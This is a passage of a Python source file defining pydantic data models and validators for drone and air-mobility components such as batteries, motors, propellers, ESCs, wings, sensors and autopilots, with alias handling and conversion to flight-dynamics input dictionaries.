skip_defaults=skip_defaults,\n exclude_unset=exclude_unset,\n exclude_defaults=exclude_defaults,\n exclude_none=exclude_none,\n )\n if by_alias and self.should_swap_aliases():\n for key, value in self.__swap_aliases__.items():\n if value in comp_dict:\n comp_dict[key] = comp_dict.pop(value)\n return comp_dict\n\n def should_swap_aliases(self):\n return False\n\n @root_validator(pre=True)\n def inject_model(cls, values):\n if \"Model\" in values:\n values[\"MODEL\"] = values.pop(\"Model\")\n\n if not values.get(\"model\", values.get(\"MODEL\", values.get(\"Model\"))):\n values[\"model\"] = values.get(\"name\", values.get(\"Name\"))\n\n for original, replace in cls.__swap_aliases__.items():\n if original in values:\n values[replace] = values.pop(original)\n\n return values\n\n @validator(\"corpus\")\n def check_corpus(cls, corpus):\n if corpus not in {\"uav\", \"uam\"}:\n raise ValueError(\"Corpus can only be either `uav` or `uam`\")\n return corpus\n\n class Config:\n allow_mutation = False\n allow_population_by_field_name = True\n extra = \"forbid\"\n\n\nclass Battery(Component):\n __swap_aliases__ = {\"BASE_VOLTAGE\": \"VOLTAGE\"}\n\n \"\"\"The Battery Component\n An example of a battery attributes in the Graph database is shown below:\n\n\n \"PEAK_DISCHARGE_RATE\": \"150\",\n \"NUMBER_OF_CELLS\": \"4S1P\",\n \"THICKNESS\": \"34\",\n \"CONT_DISCHARGE_RATE\": \"75\",\n \"VOLTAGE\": \"14.8\",\n \"CAPACITY\": \"6000\",\n \"DISCHARGE_PLUG\": \"XT90\",\n \"WIDTH\": \"69\",\n \"CHEMISTRY_TYPE\": \"LiPo\",\n \"COST\": \"99.8\",\n \"PACK_RESISTANCE\": \"9.0\",\n \"MODEL\": \"TurnigyGraphene6000mAh4S75C\",\n \"WEIGHT\": \"0.8\",\n \"LENGTH\": \"168.0\",\n \"Classification\": \"Battery\"\n \"\"\"\n battery_type: Optional[str] = Field(\n default=None, alias=\"BATTERY_TYPE\", description=\"The Battery Type\"\n )\n\n peak_discharge_rate: float = Field(\n ...,\n description=\"Peak Discharge rate of the Battery\",\n alias=\"PEAK_DISCHARGE_RATE\",\n )\n\n 
number_of_cells: Optional[str] = Field(\n None, description=\"Number of cells\", alias=\"NUMBER_OF_CELLS\"\n )\n\n thickness: float = Field(..., description=\"Thickness\", alias=\"THICKNESS\")\n\n cont_discharge_rate: float = Field(\n ..., description=\"Continuous Discharge Rate\", alias=\"CONT_DISCHARGE_RATE\"\n )\n\n voltage: float = Field(..., description=\"Voltage\", alias=\"VOLTAGE\")\n\n capacity: float = Field(\n ..., description=\"Capacity of the Battery\", alias=\"CAPACITY\"\n )\n\n discharge_plug: Optional[str] = Field(\n None, description=\"Discharge Plug Details\", alias=\"DISCHARGE_PLUG\"\n )\n\n width: Optional[float] = Field(\n None, description=\"Width of the Battery\", alias=\"WIDTH\"\n )\n\n chemistry_type: Optional[str] = Field(\n None, description=\"Chemistry Type of the Battery\", alias=\"CHEMISTRY_TYPE\"\n )\n\n cost: Optional[float] = Field(None, description=\"Cost of the Battery\", alias=\"COST\")\n\n pack_resistance: Optional[float] = Field(\n None, description=\"Pack Resistance of the Battery\", alias=\"PACK_RESISTANCE\"\n )\n\n weight: Optional[float] = Field(\n None,\n description=\"Weight of the Battery\",\n alias=\"WEIGHT\",\n )\n\n length: Optional[float] = Field(\n None, description=\"Length of the Battery\", alias=\"LENGTH\"\n )\n\n chord_1: Optional[float] = Field(None, description=\"Chord 1\", alias=\"CHORD_1\")\n\n chord_2: Optional[float] = Field(None, description=\"Chord 2\", alias=\"CHORD_2\")\n\n module_mass: Optional[float] = Field(\n None, description=\"Module Mass\", alias=\"MODULE_MASS\"\n )\n\n module_volume: Optional[float] = Field(\n None, description=\"Module Volume\", alias=\"MODULE_VOLUME\"\n )\n\n mount_side: Optional[float] = Field(\n None, description=\"Mount Side\", alias=\"MOUNT_SIDE\"\n )\n\n span: Optional[float] = Field(None, description=\"Span\", alias=\"SPAN\")\n\n taper_offset: Optional[float] = Field(\n None, description=\"TAPER_OFFSET\", alias=\"TAPER_OFFSET\"\n )\n\n voltage_request: Optional[float] = Field(\n None, description=\"Voltage Request\", alias=\"VOLTAGE_REQUEST\"\n )\n\n volume_percent: Optional[float] = Field(\n None, description=\"VOLUME_PERCENT\", alias=\"VOLUME_PERCENT\"\n )\n\n @property\n def prt_file(self) -> Optional[str]:\n return \"para_battery.prt\" if self.corpus == \"uav\" else \"mega_battery.prt\"\n\n def should_swap_aliases(self):\n return self.corpus == \"uam\"\n\n def to_fd_inp(self):\n return {\n \"num_cells\": int(self.number_of_cells[0]),\n \"voltage\": self.voltage,\n \"capacity\": self.capacity,\n \"C_Continuous\": self.cont_discharge_rate,\n \"C_Peak\": self.peak_discharge_rate,\n }\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"Chemistry Type\" in values:\n values[\"CHEMISTRY_TYPE\"] = values.pop(\"Chemistry Type\")\n if \"Discharge Plug\" in values:\n values[\"DISCHARGE_PLUG\"] = values.pop(\"Discharge Plug\")\n if \"Number of Cells\" in values:\n values[\"NUMBER_OF_CELLS\"] = values.pop(\"Number of Cells\")\n return values\n\n\nclass BatteryController(Component):\n input_voltage: float = Field(\n ..., description=\"Input Voltage\", alias=\"Input_Voltage\"\n )\n\n output_voltage: float = Field(\n ..., description=\"Output Voltage\", alias=\"Output_Voltage\"\n )\n\n\nclass Propeller(Component):\n \"\"\"The propeller component\n\n An example of a propeller attributes can be seen below:\n \"PITCH\": \"226.06\",\n \"SHAFT_DIAMETER\": \"6.35\",\n \"HUB_THICKNESS\": \"15.24\",\n \"Performance_File\": \"PER3_88x89.dat\",\n \"DIAMETER\": \"223.52\",\n \"Direction\": 
\"1\",\n \"Weight\": \"0.02608\",\n \"MODEL\": \"apc_propellers_8_8x8_9\",\n \"Classification\": \"Propeller\"\n \"\"\"\n\n hub_thickness: float = Field(\n ..., description=\"HUB_THICKNESS\", alias=\"HUB_THICKNESS\"\n )\n\n diameter: float = Field(..., description=\"Diameter\", alias=\"DIAMETER\")\n\n direction: int = Field(..., description=\"Direction\", alias=\"Direction\")\n\n performance_file: str = Field(\n ..., description=\"Performance file location/name\", alias=\"Performance_File\"\n )\n\n shaft_diameter: float = Field(\n ..., description=\"The shaft diameter of the propeller\", alias=\"SHAFT_DIAMETER\"\n )\n\n pitch: float = Field(..., description=\"The pitch of the propeller\", alias=\"PITCH\")\n\n weight: float = Field(..., description=\"Weight of the propeller\", alias=\"WEIGHT\")\n\n prop_type: Optional[int] = Field(\n default=None, description=\"The propeller type\", alias=\"Prop_type\"\n )\n\n @property\n def prt_file(self) -> Optional[str]:\n return \"para_prop.prt\"\n\n def to_fd_inp(self, data_path):\n return {\n \"cname\": f\"'{self.name}'\",\n \"ctype\": \"'MR'\",\n \"prop_fname\": f\"'{str(data_path)}{self.performance_file}'\"\n if data_path\n else f\"'{self.performance_file}'\",\n \"Ir\": (self.weight * self.diameter**2 / 12.0),\n \"x\": None,\n \"y\": None,\n \"z\": None,\n \"nx\": None,\n \"ny\": None,\n \"nz\": None,\n \"radius\": self.diameter / 2,\n \"spin\": int(self.direction),\n }\n\n @root_validator(pre=True)\n def validate_propeller_attributes(cls, values):\n if \"Weight\" in values:\n values[\"WEIGHT\"] = values.pop(\"Weight\")\n return values\n\n\nclass Motor(Component):\n \"\"\"The Motor Component in the graph database\n\n An example of motor attributes is shown below:\n\n \"MAX_POWER\": \"44.0\",\n \"TOTAL_LENGTH\": \"26.0\",\n \"CAN_DIAMETER\": \"17.7\",\n \"IO_IDLE_CURRENT@10V\": \"0.2\",\n \"SHAFT_DIAMETER\": \"4.0\",\n \"KT\": \"0.0030804182533915227\",\n \"Max # of Cells\": \"2.0\",\n \"LENGTH\": \"12.0\",\n \"PROP_PITCH_REC.\": \"2,3\",\n \"PROP_SIZE_REC.\": \"6,7\",\n \"MODEL\": \"MT13063100KV\",\n \"ESC/BEC Class\": \"3.0\",\n \"CAN_LENGTH\": \"6.0\",\n \"KM\": \"0.012371257411140733\",\n \"INTERNAL_RESISTANCE\": \"62.0\",\n \"Min # of Cells\": \"1.0\",\n \"MAX_CURRENT\": \"6.0\",\n \"COST\": \"41.9\",\n \"CONTROL_CHANNEL\": \"none\",\n \"WEIGHT\": \"0.0112\",\n \"KV\": \"3100.0\",\n \"Poles\": \"9N12P\",\n \"Classification\": \"Motor\"\n \"\"\"\n\n __swap_aliases__ = {\n \"ESC/BEC Class\": \"ESC_BEC_Class\",\n \"Max # of Cells\": \"Max_Cells\",\n \"Min # of Cells\": \"Min_Cells\",\n \"IO_IDLE_CURRENT@10V\": \"IO_IDLE_CURRENT_10V\",\n \"PROP_SIZE_REC.\": \"PROP_SIZE_REC\",\n \"PROP_PITCH_REC.\": \"PROP_PITCH_REC\",\n }\n\n max_power: float = Field(\n ..., description=\"Max power of the motor\", alias=\"MAX_POWER\"\n )\n\n io_idle_current_at_10V: float = Field(\n ..., description=\"Maximum idle current at 10V\", alias=\"IO_IDLE_CURRENT_10V\"\n )\n\n length: float = Field(..., description=\"Length of the Motor\", alias=\"LENGTH\")\n\n kt: float = Field(..., description=\"The KT rating of the Motor\", alias=\"KT\")\n\n esc_bec_class: Optional[float] = Field(\n ..., description=\"The ESC/BEC Class\", alias=\"ESC_BEC_Class\"\n )\n\n can_length: float = Field(..., description=\"The can length\", alias=\"CAN_LENGTH\")\n\n total_length: float = Field(..., description=\"Total length\", alias=\"TOTAL_LENGTH\")\n\n km: float = Field(..., description=\"KM rating of the motor\", alias=\"KM\")\n\n shaft_diameter: float = Field(\n ..., description=\"The shaft 
diameter of the motor\", alias=\"SHAFT_DIAMETER\"\n )\n\n weight: float = Field(..., description=\"Weight of the motor\", alias=\"WEIGHT\")\n\n poles: Optional[str] = Field(\n ..., description=\"The poles of the motor\", alias=\"Poles\"\n )\n\n internal_resistance: float = Field(\n ..., description=\"Internal Resistance of the motor\", alias=\"INTERNAL_RESISTANCE\"\n )\n\n control_channel: Optional[int] = Field(\n ..., description=\"The control channel\", alias=\"CONTROL_CHANNEL\"\n )\n\n adapter_length: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., description=\"The adapter length\", alias=\"ADAPTER_LENGTH\"\n )\n\n max_current: float = Field(\n ..., description=\"Max current rating of the motor\", alias=\"MAX_CURRENT\"\n )\n\n max_no_cells: int = Field(\n ..., description=\"Max number of cells in the motor\", alias=\"Max_Cells\"\n )\n\n kv: float = Field(..., description=\"The KV rating of the motor\", alias=\"KV\")\n\n cost: float = Field(..., description=\"Cost of the motor\", alias=\"COST\")\n\n can_diameter: float = Field(\n ..., description=\"The can diameter of the motor\", alias=\"CAN_DIAMETER\"\n )\n\n min_no_cells: int = Field(\n ...,\n description=\"The minimum number of cells of the motor\",\n alias=\"Min_Cells\",\n )\n\n prop_size_rec: Optional[Union[float, Tuple[float, float]]] = Field(\n ...,\n description=\"The recommended propeller size(s)\",\n alias=\"PROP_SIZE_REC\",\n )\n\n prop_pitch_rec: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., description=\"The recommended propeller pitch(es)\", alias=\"PROP_PITCH_REC\"\n )\n\n esc_pwm_rate_min: Optional[float] = Field(\n ..., description=\"ESC_PWM_RATE_MIN\", alias=\"ESC_PWM_RATE_MIN\"\n )\n\n adapter_diameter: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., description=\"Adapter diameter\", alias=\"ADAPTER_DIAMETER\"\n )\n\n esc_pwm_rate_max: Optional[float] = Field(\n ..., description=\"ESC PWM RATE MAX\", alias=\"ESC_PWM_RATE_MAX\"\n )\n\n cost_adapter: Optional[float] = Field(\n ...,\n description=\"Adapter Cost\",\n alias=\"COST_ADAPTER\",\n )\n\n esc_rate: Optional[float] = Field(..., description=\"ESC_RATE\", alias=\"ESC_RATE\")\n\n @property\n def prt_file(self):\n return \"para_motor.prt\"\n\n def to_fd_inp(self):\n return {\n \"motor_fname\": f\"'../../Motors/{self.name}'\",\n \"KV\": self.kv,\n \"KT\": self.kt,\n \"I_max\": self.max_current,\n \"I_idle\": self.io_idle_current_at_10V,\n \"maxpower\": self.max_power,\n \"Rw\": self.internal_resistance / 1000.0,\n \"icontrol\": None,\n \"ibattery\": None,\n }\n\n def should_swap_aliases(self):\n return self.corpus == \"uav\"\n\n @validator(\"prop_size_rec\", pre=True, always=True)\n def validate_prop_size_rec(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"prop_pitch_rec\", pre=True, always=True)\n def validate_prop_pitch_rec(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"adapter_diameter\", pre=True, always=True)\n def validate_adapter_diameter(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"adapter_length\", pre=True, always=True)\n def validate_adapter_length(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"max_no_cells\", \"min_no_cells\", pre=True, always=True)\n def validate_int(cls, 
cell):\n return int(float(cell))\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"CONTROL_CHANNEL\" in values and values[\"CONTROL_CHANNEL\"] == \"none\":\n values[\"CONTROL_CHANNEL\"] = None\n\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass ESC(Component):\n length: float = Field(..., description=\"Length of the ESC\", alias=\"LENGTH\")\n\n cont_amps: Optional[float] = Field(\n ..., description=\"Continuous ampere ratings\", alias=\"CONT_AMPS\"\n )\n\n max_voltage: float = Field(..., description=\"Maximum voltage\", alias=\"MAX_VOLTAGE\")\n\n bec: Optional[Union[float, Tuple]] = Field(\n ..., description=\"BEC_RATING\", alias=\"BEC\"\n )\n\n bec_output_cont_amps: Optional[Union[float, Tuple]] = Field(\n ...,\n description=\"Bec Output in continuous amps\",\n alias=\"BEC_OUTPUT_CONT_AMPS\",\n )\n\n bec_output_peak_amps: Optional[float] = Field(\n ..., description=\"Bec output peak amps\", alias=\"BEC_OUTPUT_PEAK_AMPS\"\n )\n\n cost: float = Field(..., description=\"Cost of the ESC Component\", alias=\"COST\")\n\n bec_output_voltage: Optional[Union[float, Tuple]] = Field(\n ..., description=\"Bec output voltage\", alias=\"BEC_OUTPUT_VOLTAGE\"\n )\n\n control_channel: Optional[int] = Field(\n ..., description=\"Control Channel\", alias=\"CONTROL_CHANNEL\"\n )\n\n esc_bec_class: Optional[float] = Field(\n ..., description=\"The ESC/BEC Class\", alias=\"ESC/BEC Class\"\n )\n\n thickness: float = Field(..., description=\"THICKNESS\", alias=\"THICKNESS\")\n\n offset: Optional[float] = Field(..., description=\"Offset\", alias=\"Offset\")\n\n mount_angle: Optional[float] = Field(..., description=\"The mount angle\", alias=\"Mount_Angle\")\n\n tube_od: Optional[float] = Field(..., description=\"The tube OD\", alias=\"TUBE_OD\")\n\n width: float = Field(..., description=\"The width of ESC\", alias=\"WIDTH\")\n\n weight: float = Field(..., description=\"The weight of ESC\", alias=\"WEIGHT\")\n\n peak_amps: Optional[float] = Field(\n ...,\n description=\"The Peak ampere ratings for the ESC controller\",\n alias=\"PEAK_AMPS\",\n )\n\n @property\n def prt_file(self):\n return \"para_esc.prt\"\n\n @validator(\"bec\", pre=True, always=True)\n def validate_bec(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"bec_output_voltage\", pre=True, always=True)\n def validate_bec_output_voltage(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"bec_output_cont_amps\", pre=True, always=True)\n def validate_bec_output_cont_amps(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"Control_Channel\" in values:\n values[\"CONTROL_CHANNEL\"] = values.pop(\"Control_Channel\")\n for field in [\"Offset\", \"Mount_Angle\", \"CONTROL_CHANNEL\", \"TUBE_OD\"]:\n if field in values and values[field] == \"none\":\n values[field] = None\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Instrument_Battery(Battery):\n \"\"\"The Instrument Battery Component\"\"\"\n\n @property\n def prt_file(self) -> Optional[str]:\n return None\n\n\nclass Wing(Component):\n \"\"\"The Wing Component\"\"\"\n\n span: Optional[float] = Field(..., description=\"SPAN property\", alias=\"SPAN\")\n\n aileron_bias: Optional[float] = Field(..., description=\"BIAS\", alias=\"AILERON_BIAS\")\n\n 
aoa_cl_max: Optional[float] = Field(\n None, description=\"AoA_CL_Max\", alias=\"AoA_CL_Max\"\n )\n\n offset: Optional[float] = Field(None, description=\"OFFSET\", alias=\"OFFSET\")\n\n control_channel_flaps: Optional[int] = Field(\n None, description=\"CONTROL_CHANNEL_FLAPS\", alias=\"CONTROL_CHANNEL_FLAPS\"\n )\n\n cl_max: Optional[float] = Field(None, description=\"CL_Max\", alias=\"CL_Max\")\n\n cl_max_cd0_min: Optional[float] = Field(\n None, description=\"CL_Max_CD0_Min\", alias=\"CL_Max_CD0_Min\"\n )\n\n last_two: Optional[float] = Field(None, description=\"LAST_TWO\", alias=\"LASTTWO\")\n\n chord: Optional[float] = Field(None, description=\"CHORD\", alias=\"CHORD\")\n\n tube_offset: Optional[float] = Field(\n None, description=\"Tube Offset\", alias=\"TUBE_OFFSET\"\n )\n\n cl_ld_max: Optional[float] = Field(None, description=\"CL_LD_Max\", alias=\"CL_LD_Max\")\n\n servo_width: Optional[float] = Field(\n None, description=\"Servo Width\", alias=\"SERVO_WIDTH\"\n )\n\n aoa_l0: Optional[float] = Field(None, description=\"AOA_L0\", alias=\"AoA_L0\")\n\n dcl_daoa_slope: Optional[float] = Field(\n None, description=\"dCl_dAoA_Slope\", alias=\"dCl_dAoA_Slope\"\n )\n\n control_channel_ailerons: Optional[int] = Field(\n None, description=\"CONTROL_CHANNEL_AILERONS\", alias=\"CONTROL_CHANNEL_AILERONS\"\n )\n\n diameter: Optional[float] = Field(None, description=\"DIAMETER\", alias=\"DIAMETER\")\n\n ld_max: Optional[float] = Field(None, description=\"LD_Max\", alias=\"LD_Max\")\n\n servo_length: Optional[float] = Field(\n None, description=\"SERVO_LENGTH\", alias=\"SERVO_LENGTH\"\n )\n\n cd0_min: Optional[float] = Field(None, description=\"CD0_Min\", alias=\"CD0_Min\")\n\n cd_min: Optional[float] = Field(None, description=\"CD_MIN\", alias=\"CD_Min\")\n\n cm0: Optional[float] = Field(None, description=\"CM0\", alias=\"CM0\")\n\n flap_bias: Optional[float] = Field(..., description=\"Flap Bias\", alias=\"FLAP_BIAS\")\n\n chord_1: Optional[float] = Field(None, description=\"Chord 1\", alias=\"CHORD_1\")\n\n chord_2: Optional[float] = Field(None, description=\"Chord 2\", alias=\"CHORD_2\")\n\n load: Optional[float] = Field(None, description=\"Load\", alias=\"LOAD\")\n\n naca_profile: Optional[str] = Field(\n None, description=\"NACA Profile\", alias=\"NACA_Profile\"\n )\n\n taper_offset: Optional[float] = Field(\n None, description=\"Taper Offset\", alias=\"TAPER_OFFSET\"\n )\n\n thickness: Optional[float] = Field(None, description=\"Thickness\", alias=\"THICKNESS\")\n\n @property\n def prt_file(self):\n return (\n \"para_wing_left.prt\"\n if self.name.startswith(\"left\")\n else \"para_wing_right.prt\"\n )\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n for field in [\n \"SPAN\",\n \"AILERON_BIAS\",\n \"OFFSET\",\n \"SERVO_WIDTH\",\n \"SERVO_LENGTH\",\n \"CONTROL_CHANNEL_FLAPS\",\n \"DIAMETER\",\n \"FLAP_BIAS\",\n \"TUBE_OFFSET\",\n \"CONTROL_CHANNEL_AILERONS\",\n ]:\n if field in values and values[field] == \"none\":\n values[field] = None\n\n return values\n\n\nclass GPS(Component):\n \"\"\"The GPS Component\"\"\"\n\n min_voltage: Optional[float] = Field(\n ..., description=\"Minimum Voltage\", alias=\"MIN_VOLTAGE\"\n )\n\n output_rate: float = Field(..., description=\"Output Rate\", alias=\"OUTPUT_RATE\")\n\n max_voltage: Optional[float] = Field(\n ..., description=\"Maximum Voltage\", alias=\"MAX_VOLTAGE\"\n )\n\n power_consumption: float = Field(\n ..., description=\"Power Consumption\", alias=\"POWER_CONSUMPTION\"\n )\n\n max_current_range: Optional[float] = Field(\n ..., 
description=\"Max Current Range\", alias=\"MAX_CURRENT_RANGE\"\n )\n\n cost: float = Field(..., description=\"COST\", alias=\"Cost\")\n\n gps_loc: str = Field(..., description=\"GPS_Location\", alias=\"GPS_Location\")\n\n weight: float = Field(..., description=\"Weight of the GPS\", alias=\"WEIGHT\")\n\n number_of_gnss: float = Field(\n ..., description=\"NUMBER_of_GNSS\", alias=\"Number_of_GNSS\"\n )\n\n gps_accuracy: float = Field(..., description=\"GPS_ACCURACY\", alias=\"GPS_ACCURACY\")\n\n diameter: float = Field(..., description=\"Diameter\", alias=\"DIAMETER\")\n\n height: float = Field(..., description=\"Height\", alias=\"HEIGHT\")\n\n @property\n def prt_file(self):\n return \"para_gps.prt\"\n\n @root_validator(pre=True)\n def validate_gps_fields(cls, values):\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Servo(Component):\n travel: float = Field(..., description=\"Travel\", alias=\"Travel\")\n\n LENF: float = Field(..., description=\"LenF\", alias=\"LENF\")\n\n min_stall_torque: float = Field(\n ..., description=\"Min_Stall_Torque\", alias=\"Min_Stall_Torque\"\n )\n\n output_shaft_spline: str = Field(\n ..., description=\"Output_Shaft_Spline\", alias=\"Output_Shaft_Spline\"\n )\n\n wire_gauge: float = Field(..., description=\"Wire_Gauge\", alias=\"Wire_Gauge\")\n\n current_no_load: float = Field(\n ..., description=\"Current at no load\", alias=\"Current_No_Load\"\n )\n\n deadband_width: float = Field(\n ..., description=\"Dead Band Width\", alias=\"Deadband_Width\"\n )\n\n weight: float = Field(..., description=\"WEIGHT\", alias=\"WEIGHT\")\n\n lend: float = Field(..., description=\"Lend\", alias=\"LEND\")\n\n min_no_load_speed: float = Field(\n ..., description=\"No load speed minimum\", alias=\"Min_No_Load_Speed\"\n )\n\n idle_current: float = Field(..., description=\"Current_Idle\", alias=\"Current_Idle\")\n\n max_voltage: float = Field(..., description=\"Max_Voltage\", alias=\"Max_Voltage\")\n\n len_e: float = Field(..., description=\"Lene\", alias=\"LENE\")\n\n max_stall_torque: float = Field(\n ..., description=\"Max stall torque\", alias=\"Max_Stall_Torque\"\n )\n\n max_rotation: float = Field(..., description=\"Max Rotation\", alias=\"Max_Rotation\")\n\n len_a: float = Field(..., description=\"Len A\", alias=\"LENA\")\n\n min_voltage: float = Field(..., description=\"Minimum Voltage\", alias=\"Min_Voltage\")\n\n len_c: float = Field(..., description=\"Len C\", alias=\"LENC\")\n\n max_no_load_speed: float = Field(\n ..., description=\"Max_No_Load_Speed\", alias=\"Max_No_Load_Speed\"\n )\n\n max_pwm_range: str = Field(..., description=\"Max PWM range\", alias=\"Max_PWM_Range\")\n\n len_b: float = Field(..., description=\"Len B\", alias=\"LENB\")\n\n stall_current: float = Field(\n ..., description=\"Stall Current\", alias=\"Stall_Current\"\n )\n\n servo_class: str = Field(..., description=\"Servo Class\", alias=\"Servo_Class\")\n\n @property\n def prt_file(self):\n return \"para_servo.prt\"\n\n\nclass Receiver(Component):\n max_voltage: float = Field(..., description=\"Maximum Voltage\", alias=\"MAX_VOLTAGE\")\n\n width: float = Field(..., description=\"Width\", alias=\"WIDTH\")\n\n height: float = Field(..., description=\"Height\", alias=\"HEIGHT\")\n\n weight: float = Field(..., description=\"Weight\", alias=\"WEIGHT\")\n\n min_voltage: float = Field(..., description=\"Minimum Voltage\", alias=\"MIN_VOLTAGE\")\n\n power_consumption: float = Field(\n ..., description=\"POWER_CONSUMPTION\", alias=\"POWER_CONSUMPTION\"\n )\n\n length: float = 
Field(..., description=\"Length\", alias=\"LENGTH\")\n\n cost: float = Field(..., description=\"Cost\", alias=\"Cost ($)\")\n\n max_no_channels: float = Field(\n ..., description=\"Maximum Number of Channels\", alias=\"Max_Number_of_Channels\"\n )\n\n @property\n def prt_file(self):\n return \"para_receiver.prt\"\n\n\nclass Sensor(Component):\n max_voltage: Optional[float] = Field(\n ..., description=\"Max Voltage\", alias=\"MAX_VOLTAGE\"\n )\n\n weight: float = Field(..., description=\"Weight\", alias=\"WEIGHT\")\n\n cost: float = Field(..., description=\"COST\", alias=\"Cost\")\n\n length: float = Field(..., description=\"LENGTH\", alias=\"LENGTH\")\n\n power_consumption: float = Field(\n ..., description=\"POWER_CONSUMPTION\", alias=\"POWER_CONSUMPTION\"\n )\n\n height: float = Field(..., description=\"Height\", alias=\"HEIGHT\")\n\n min_voltage: Optional[float] = Field(\n ..., description=\"MIN_VOLTAGE\", alias=\"MIN_VOLTAGE\"\n )\n\n voltage_precision: Optional[float] = Field(\n ..., description=\"VOLTAGE_PRECISION\", alias=\"VOLTAGE_PRECISION\"\n )\n\n width: float = Field(..., description=\"WIDTH\", alias=\"WIDTH\")\n\n max_altitude: Optional[float] = Field(\n ..., description=\"Max altitude\", alias=\"MAX_ALTITUDE\"\n )\n\n min_altitude: Optional[float] = Field(\n ..., description=\"Min altitude\", alias=\"MIN_ALTITUDE\"\n )\n\n altitude_precision: Optional[float] = Field(\n ..., description=\"Altitude Precision\", alias=\"ALTITUDE_PRECISION\"\n )\n\n max_rpm: Optional[float] = Field(..., description=\"Max rpm\", alias=\"MAX_RPM\")\n\n min_rpm: Optional[float] = Field(..., description=\"Min rpm\", alias=\"MIN_RPM\")\n\n max_temp: Optional[float] = Field(\n ..., description=\"Max Temperature\", alias=\"MAX_TEMP\"\n )\n\n min_temp: Optional[float] = Field(\n ..., description=\"Min Temperature\", alias=\"MIN_TEMP\"\n )\n\n @property\n def prt_file(self):\n return \"para_sensor.prt\"\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Autopilot(Component):\n max_servo_rail_voltage: float = Field(\n ..., description=\"Max servo rail voltage\", alias=\"MAX_SERVO_RAIL_VOLTAGE\"\n )\n\n can: float = Field(..., description=\"can\", alias=\"CAN\")\n\n acc_gyro_1: str = Field(..., description=\"ACCGyro_1\", alias=\"AccGyro_1\")\n\n i2c: float = Field(..., description=\"I2C\", alias=\"I2C\")\n\n no_of_telem_inputs: float = Field(\n ..., description=\"No. of telem inputs\", alias=\"Number_of_Telem_Inputs\"\n )\n\n uart: Optional[float] = Field(..., description=\"UART\", alias=\"UART\")\n\n fmu_cached_memory: float = Field(\n ..., description=\"FMU_CACHED_MEMORY\", alias=\"FMU_CACHED_MEMORY\"\n )\n\n width: float = Field(..., description=\"WIDTH\", alias=\"WIDTH\")\n\n magnetometer: str = Field(..., description=\"Magnetometer\", alias=\"Magnetometer\")\n\n acc_gyro_3: Optional[str] = Field(..., description=\"AccGyro_3\", alias=\"AccGyro_3\")\n\n cost: float = Field(..., description=\"Cost\", alias=\"COST\")\n\n height: float = Field(..., description=\"height\", alias=\"HEIGHT\")\n\n main_fmu_processor: str = Field(\n ..., description=\"MAIN_FMU_PROCESSOR\", alias=\"Main_FMU_Processor\"\n )\n\n no_of_input_batteries: str = Field(\n ..., description=\"No. 
of input batteries\", alias=\"Number_of_Input_Batteries\"\n )\n\n weight: float = Field(..., description=\"Weight\", alias=\"WEIGHT\")\n\n fmu_bits: float = Field(..., description=\"FMU_Bits\", alias=\"FMU_Bits\")\n\n input_voltage: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., description=\"INPUT_VOLTAGE\", alias=\"INPUT_VOLTAGE\"\n )\n\n barometer_1: str = Field(..., description=\"Barometer_1\", alias=\"Barometer_1\")\n\n spi: float = Field(..., description=\"SPI\", alias=\"SPI\")\n\n fmu_speed: float = Field(..., description=\"FMU_SPEED\", alias=\"FMU_SPEED\")\n\n acc_gyro_2: str = Field(..., description=\"ACC_GYRO2\", alias=\"AccGyro_2\")\n\n pwm_outputs: float = Field(..., description=\"PWM_Outputs\", alias=\"PWM_Outputs\")\n\n pwm_inputs: Optional[float] = Field(\n ..., description=\"PWM_Inputs\", alias=\"PWM_Inputs\"\n )\n\n barometer_2: Optional[str] = Field(\n ..., description=\"Second barometer\", alias=\"Barometer_2\"\n )\n\n fmu_ram: float = Field(..., description=\"FMU_RAM\", alias=\"FMU_RAM\")\n\n adc: float = Field(..., description=\"ADC\", alias=\"ADC\")\n\n length: float = Field(..., description=\"LENGTH\", alias=\"LENGTH\")\n\n io_bits: Optional[float] = Field(..., description=\"IO_Bits\", alias=\"IO_Bits\")\n\n io_processor: Optional[str] = Field(\n ..., description=\"IO_Processor\", alias=\"IO_Processor\"\n )\n\n io_ram: Optional[float] = Field(..., description=\"IO_RAM\", alias=\"IO_RAM\")\n\n io_speed: Optional[float] = Field(..., description=\"IO_SPEED\", alias=\"IO_SPEED\")\n\n @property\n def prt_file(self):\n return None # ToDo: is this the same as FlightController?\n\n @validator(\"input_voltage\", pre=True, always=True)\n def validate_input_voltage(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"Number_of_Tele_ Inputs\" in values:\n values[\"Number_of_Telem_Inputs\"] = values.pop(\"Number_of_Tele_ Inputs\")\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Flange(Component):\n od: float = Field(..., description=\"Outer Diameter\", alias=\"OD\")\n\n box: float = Field(..., description=\"Box\", alias=\"BOX\")\n\n clock_angle: Optional[float] = Field(\n None, description=\"The Clock Angle\", alias=\"CLOCK_ANGLE\"\n )\n\n sidemount_offset: 